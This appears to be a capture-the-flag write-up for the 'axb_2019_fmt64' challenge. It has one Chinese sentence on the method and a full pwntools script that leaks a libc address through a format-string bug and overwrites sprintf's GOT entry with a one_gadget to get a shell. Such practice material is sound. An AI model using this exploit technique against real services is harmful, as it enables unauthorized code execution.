axb_2019_fmt64

exp

有格式化字符串漏洞，泄露got表地址，改sprintf为one_gadget，当函数再次调用sprintf即可拿shell。（使用格式化漏洞任意写的时候注意printf已经先输出了9个字符，要减去）

from pwn import *

#context.log_level = 'debug'

#io = process('./idaidg/linux_server64')
io = remote('node3.buuoj.cn',29548)
#io = process('axb_2019_fmt64')
elf = ELF('./axb_2019_fmt64')
#libc = elf.libc
libc = ELF('./libc/libc-2.23.so')

one_gadget = [0x45216,0x4526a,0xf02a4,0xf1147]
sprintf_got = elf.got['sprintf']

payload = '%9$saaaa'
payload += p64(sprintf_got)

io.recvuntil("Please tell me:")
io.sendline(payload)

sprintf_addr = u64(io.recvuntil('\x7f')[-6:].ljust(8,'\x00'))

print "sprintf_addr:"+hex(sprintf_addr)

libcbase = sprintf_addr - libc.symbols['sprintf']
one_gadget = libcbase + one_gadget[0]

print "one_gadget:"+hex(one_gadget)

payload = ''
payload += '%' + str((one_gadget % 0x10000) - 9) + 'c%12$hn'
payload += '%' + str(((one_gadget >> 16) % 0x10000) - (one_gadget % 0x10000)) + 'c%13$hn'
payload = payload.ljust(0x20,'\x00')
payload += p64(sprintf_got) + p64(sprintf_got + 2)

print 'payload:'+payload

io.sendline(payload)

io.interactive()